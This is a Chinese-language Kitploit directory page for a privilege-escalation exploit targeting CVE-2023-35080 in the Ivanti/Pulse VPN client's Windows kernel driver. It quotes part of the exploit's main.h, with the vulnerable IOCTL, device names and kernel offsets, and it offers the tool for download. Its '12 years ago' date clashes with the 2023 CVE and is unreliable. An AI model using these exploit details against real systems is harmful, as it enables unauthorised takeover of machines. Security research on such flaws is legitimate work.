Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation — 利用 CVE-2023-35080 的漏洞利用程序,通过 Windows 上 Ivanti/Pulse VPN 客户端内核驱动程序中的写入原语实现权限提升。 | Kitploit
工具/GitHubGitHub/hophouse/ivanti-pulse_vpn-client_exploit-cve-2023-35080_privilege-escalation
权限提升漏洞利用框架漏洞分析漏洞利用二进制利用
GitHubhophouse/ivanti-pulse_vpn-client_exploit-cve-2023-35080_privilege-escalation

Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation

利用 CVE-2023-35080 的漏洞利用程序,通过 Windows 上 Ivanti/Pulse VPN 客户端内核驱动程序中的写入原语实现权限提升。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
12年前尚未审核

Ivanti/Pulse VPN 客户端利用 CVE-2023-35080 实现权限提升

该代码与 CVE-2023-35080 的利用相关,利用了 Windows 中 Ivanti/Pulse VPN 客户端内核驱动程序的写入原语。 该写入原语导致权限提升。

此利用程序基于以下文章中分享的技术细节构建:https://northwave-cybersecurity.com/ivanti-pulse-vpn-privilege-escalation。

一些细节硬编码在 main.h 文件中:

root@kitploit:~
#pragma once

#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <winternl.h>


#define VULN_IOCTL  0x80002018

////////

/*
 * jnprTdi_9115_15819 W10
 */

 // #define DEVICE_NAME_W L"jnprTdi_9115_15819"

 // // KxWaitForSpinLockAndAcquire
 // #define SPIN_OFFSET 0x300ea0

 // // KxTryToAcquireSpinLock
 // #define TRY_SPIN_OFFSET 0x361758

 // // void write_char(byte param_1,byte **param_2,int *param_3)
 // #define WRITE_CHAR_OFFSET 0x3d5878

 ////////

 /*
  * jnprTdi_9117_18209 W11
  */

#define DEVICE_NAME_W L"jnprTdi_9117_18209"

  // KxWaitForSpinLockAndAcquire 
#define SPIN_OFFSET 0x300e9e

// KxTryToAcquireSpinLock
#define TRY_SPIN_OFFSET 0x361757

// void write_char(byte param_1,byte **param_2,int *param_3)
#define WRITE_CHAR_OFFSET 0x3d93f8

////////

[...]
下载工具